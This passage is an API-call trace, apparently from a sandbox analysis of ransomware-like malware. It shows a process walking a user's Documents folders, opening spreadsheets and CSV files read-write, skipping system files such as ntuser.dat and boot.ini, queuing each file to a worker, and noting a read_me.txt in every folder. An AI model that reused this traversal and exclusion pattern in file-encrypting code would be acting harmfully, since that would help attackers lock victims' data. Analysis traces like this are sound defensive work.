99V2-v6\\2x0rhX3GpeC7V\\--wFzQ_fQiax.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\2x0rhx3gpec7v\\--wfzq_fqiax.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8bc [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="read_me.txt") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="autoexec.bat") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="desktop.ini") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="autorun.inf") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="ntuser.dat") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="iconcache.db") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="bootsect.bak") returned 0x0 [0076.034] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="boot.ini") returned 0x0 [0076.035] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="ntuser.dat.log") returned 0x0 [0076.035] StrStrW (lpFirst="--wfzq_fqiax.ods", lpSrch="thumbs.db") returned 0x0 [0076.035] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 80 [0076.035] QueueUserWorkItem (Function=0x404e00, Context=0x8bc, Flags=0x0) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e5b5ba0, ftCreationTime.dwHighDateTime=0x1d4c8fd, ftLastAccessTime.dwLowDateTime=0x6e17a340, ftLastAccessTime.dwHighDateTime=0x1d4c8ac, ftLastWriteTime.dwLowDateTime=0x6e17a340, ftLastWriteTime.dwHighDateTime=0x1d4c8ac, nFileSizeHigh=0x0, nFileSizeLow=0x908f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="njqLpitsRlBgIkVSRsc.csv", cAlternateFileName="NJQLPI~1.CSV")) returned 1 [0076.035] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\njqLpitsRlBgIkVSRsc.csv") returned 115 [0076.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\njqLpitsRlBgIkVSRsc.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\2x0rhx3gpec7v\\njqlpitsrlbgikvsrsc.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="read_me.txt") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="autoexec.bat") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="desktop.ini") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="autorun.inf") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="ntuser.dat") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="iconcache.db") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="bootsect.bak") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="boot.ini") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="ntuser.dat.log") returned 0x0 [0076.035] StrStrW (lpFirst="njqlpitsrlbgikvsrsc.csv", lpSrch="thumbs.db") returned 0x0 [0076.035] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 81 [0076.035] QueueUserWorkItem (Function=0x404e00, Context=0x8c0, Flags=0x0) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246cb4c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246f1620, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.035] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\read_me.txt") returned 103 [0076.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\2x0rhx3gpec7v\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c4 [0076.036] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.036] CloseHandle (hObject=0x8c4) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246cb4c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246f1620, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.036] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.036] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\read_me.txt") returned 103 [0076.036] GetProcessHeap () returned 0x4f10000 [0076.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0076.036] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 48 [0076.036] GetProcessHeap () returned 0x4f10000 [0076.036] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8be00f8 | out: hHeap=0x4f10000) returned 1 [0076.036] GetProcessHeap () returned 0x4f10000 [0076.036] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8be00f8 [0076.036] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\*") returned 97 [0076.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.036] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\.") returned 97 [0076.036] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.036] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\..") returned 98 [0076.036] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908e36a0, ftCreationTime.dwHighDateTime=0x1d4d531, ftLastAccessTime.dwLowDateTime=0x34212250, ftLastAccessTime.dwHighDateTime=0x1d4cdad, ftLastWriteTime.dwLowDateTime=0x34212250, ftLastWriteTime.dwHighDateTime=0x1d4cdad, nFileSizeHigh=0x0, nFileSizeLow=0x6a7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mZk3qpXWxbFEStM.xlsx", cAlternateFileName="MZK3QP~1.XLS")) returned 1 [0076.036] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\mZk3qpXWxbFEStM.xlsx") returned 116 [0076.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\mZk3qpXWxbFEStM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\mk_tjrrpsh202xbyb\\mzk3qpxwxbfestm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c4 [0076.036] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="boot.ini") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.037] StrStrW (lpFirst="mzk3qpxwxbfestm.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.037] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 82 [0076.037] QueueUserWorkItem (Function=0x404e00, Context=0x8c4, Flags=0x0) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246f1620, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246f1620, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.037] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\read_me.txt") returned 107 [0076.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\mk_tjrrpsh202xbyb\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0076.037] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.037] CloseHandle (hObject=0x8c8) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa605d600, ftCreationTime.dwHighDateTime=0x1d4d06d, ftLastAccessTime.dwLowDateTime=0x13d4de50, ftLastAccessTime.dwHighDateTime=0x1d4cc73, ftLastWriteTime.dwLowDateTime=0x13d4de50, ftLastWriteTime.dwHighDateTime=0x1d4cc73, nFileSizeHigh=0x0, nFileSizeLow=0x17a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwAoWvLQX1Qkqb1WAal.xls", cAlternateFileName="YWAOWV~1.XLS")) returned 1 [0076.037] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\YwAoWvLQX1Qkqb1WAal.xls") returned 119 [0076.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\YwAoWvLQX1Qkqb1WAal.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\mk_tjrrpsh202xbyb\\ywaowvlqx1qkqb1waal.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0076.037] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="read_me.txt") returned 0x0 [0076.037] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="autoexec.bat") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="desktop.ini") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="autorun.inf") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="ntuser.dat") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="iconcache.db") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="bootsect.bak") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="boot.ini") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="ntuser.dat.log") returned 0x0 [0076.038] StrStrW (lpFirst="ywaowvlqx1qkqb1waal.xls", lpSrch="thumbs.db") returned 0x0 [0076.038] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 83 [0076.038] QueueUserWorkItem (Function=0x404e00, Context=0x8c8, Flags=0x0) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa605d600, ftCreationTime.dwHighDateTime=0x1d4d06d, ftLastAccessTime.dwLowDateTime=0x13d4de50, ftLastAccessTime.dwHighDateTime=0x1d4cc73, ftLastWriteTime.dwLowDateTime=0x13d4de50, ftLastWriteTime.dwHighDateTime=0x1d4cc73, nFileSizeHigh=0x0, nFileSizeLow=0x17a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywaowvlqx1qkqb1waal.xls", cAlternateFileName="YWAOWV~1.XLS")) returned 0 [0076.038] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.038] wnsprintfW (in: pszDest=0x8be00f8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB\\read_me.txt") returned 107 [0076.038] GetProcessHeap () returned 0x4f10000 [0076.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8be00f8 | out: hHeap=0x4f10000) returned 1 [0076.038] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 49 [0076.038] GetProcessHeap () returned 0x4f10000 [0076.038] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bf0100 | out: hHeap=0x4f10000) returned 1 [0076.043] GetProcessHeap () returned 0x4f10000 [0076.043] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0076.044] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\*") returned 78 [0076.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.044] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\.") returned 78 [0076.044] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9cbcf40, ftCreationTime.dwHighDateTime=0x1d4cfde, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.044] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\..") returned 79 [0076.044] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf012e300, ftCreationTime.dwHighDateTime=0x1d4c960, ftLastAccessTime.dwLowDateTime=0x6b5ef530, ftLastAccessTime.dwHighDateTime=0x1d4d58c, ftLastWriteTime.dwLowDateTime=0x6b5ef530, ftLastWriteTime.dwHighDateTime=0x1d4d58c, nFileSizeHigh=0x0, nFileSizeLow=0x2b64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3hM_Yv-O.ods", cAlternateFileName="")) returned 1 [0076.044] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\3hM_Yv-O.ods") returned 89 [0076.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\3hM_Yv-O.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\g_x-ehiang489wx\\3hm_yv-o.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8cc [0076.044] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="read_me.txt") returned 0x0 [0076.044] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="autoexec.bat") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="desktop.ini") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="autorun.inf") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="ntuser.dat") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="iconcache.db") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="bootsect.bak") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="boot.ini") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="ntuser.dat.log") returned 0x0 [0076.045] StrStrW (lpFirst="3hm_yv-o.ods", lpSrch="thumbs.db") returned 0x0 [0076.045] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 84 [0076.045] QueueUserWorkItem (Function=0x404e00, Context=0x8cc, Flags=0x0) returned 1 [0076.045] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d069cb0, ftCreationTime.dwHighDateTime=0x1d4d00b, ftLastAccessTime.dwLowDateTime=0x95e5ee30, ftLastAccessTime.dwHighDateTime=0x1d4caf1, ftLastWriteTime.dwLowDateTime=0x95e5ee30, ftLastWriteTime.dwHighDateTime=0x1d4caf1, nFileSizeHigh=0x0, nFileSizeLow=0x169c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LIWzry.csv", cAlternateFileName="")) returned 1 [0076.045] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\LIWzry.csv") returned 87 [0076.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\LIWzry.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\g_x-ehiang489wx\\liwzry.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="read_me.txt") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="autoexec.bat") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="desktop.ini") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="autorun.inf") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="ntuser.dat") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="iconcache.db") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="bootsect.bak") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="boot.ini") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="ntuser.dat.log") returned 0x0 [0076.045] StrStrW (lpFirst="liwzry.csv", lpSrch="thumbs.db") returned 0x0 [0076.046] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 85 [0076.046] QueueUserWorkItem (Function=0x404e00, Context=0x8d0, Flags=0x0) returned 1 [0076.046] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2473d8e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.046] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\read_me.txt") returned 88 [0076.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\G_x-eHIang489Wx\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\g_x-ehiang489wx\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0076.046] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.046] CloseHandle (hObject=0x8d4) returned 1 [0076.046] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2473d8e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24763a40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", 